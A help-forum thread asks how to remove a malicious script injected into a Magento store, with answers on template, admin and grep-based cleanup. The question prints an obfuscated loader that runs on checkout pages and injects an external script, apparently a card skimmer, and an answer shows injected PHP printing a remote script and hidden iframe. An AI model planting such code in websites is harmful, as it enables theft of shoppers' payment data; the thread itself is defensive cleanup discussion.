Magento Question posted in
The official documentation can be found here.

How to remove script inserted after the body tag in Magento?

I have a malicious script that’s been inserted right after the body tag and I don’t know which file to check to remove it, I’ve checked everywhere in the admin as well as template files and it’s not where to be found. The virus looks like this:

if((new 
RegExp('onepage|checkout|onestep|firecheckout')).test(window.location)) 
{document.write('>tpircs/<>"sj.tekramroced/crs/knil.sj-
knil//:sptth"=crs tpircs<'.split("").reverse().join(""))};
Tags:

2

Answers


  1. 0

    Please try below approaches

    I would recommend the following approach for removing third party scripts in Magento:

    > Approach 1. Please go to your theme app/design/frontend/Yourtheme/default/template/page/ , open following files and find this code and comment, after clear cache and check your store.

    <?php echo $this->getAbsoluteFooter() ?>

    1column.phtml

    2columns-left.phtml

    2columns-right.phtml

    3columns.phtml

    All Miscellaneous code comes under getAbsoluteFooter() function,

    > Approach 2: GO Admin Panel General > Design > Footer > Miscellaneous HTML

    > Approach 3 : Go to local.xml/page.xml file and check this below code, might be added on same file like this

    <block type="core/text_list" name="after_body_start" as="after_body_start" translate="label">
    <label>Page Top</label>

    Hope it’s helpful for you.

    Login or Signup to reply.
  2. 0

    As long as you know what the names of the scripts are, it’s easy to get rid of these malicious scripts.

    I had many of these scripts injected into my website, most of them were scripts and iframes pointing to a domain http://siteverification.online.

    I am not a Magento expert but I figured that then can come from only 2 places:

    1. The Database
    2. Filesystem (HTML templates or PHP files)

    For the database, I am using MySQL, and since I have PhpMyAdmin installed I took advantage of its Search function, which can search all fields of all tables of the database. I just searched for siteverification.online and found some entries, and deleted them.

    For the filesystem, I logged on through SSH and just search the whole magento website filesystem, like this:

    $ grep -r "siteverification.online" /var/www/magento-project
  ./index.php:print('<script type="text/javascript" src="http://siteverification.online/lib/status.js"></script>');
  ./index.php:print('<iframe src="http://siteverification.online/" frameborder="0" width="0" height="0"></iframe>');

    In my case it turns out that some PHP code was injected in index.php. But if code was injected in any other php or html file this would find them as well since the search is recursive (-r flag).

    That’s it. I don’t even understand Magento’s filesystem and database structures, but using these radical search methods I got rid of all the malware in a few minutes.

    Login or Signup to reply.
Please signup or login to give your own answer.

Back To Top
Search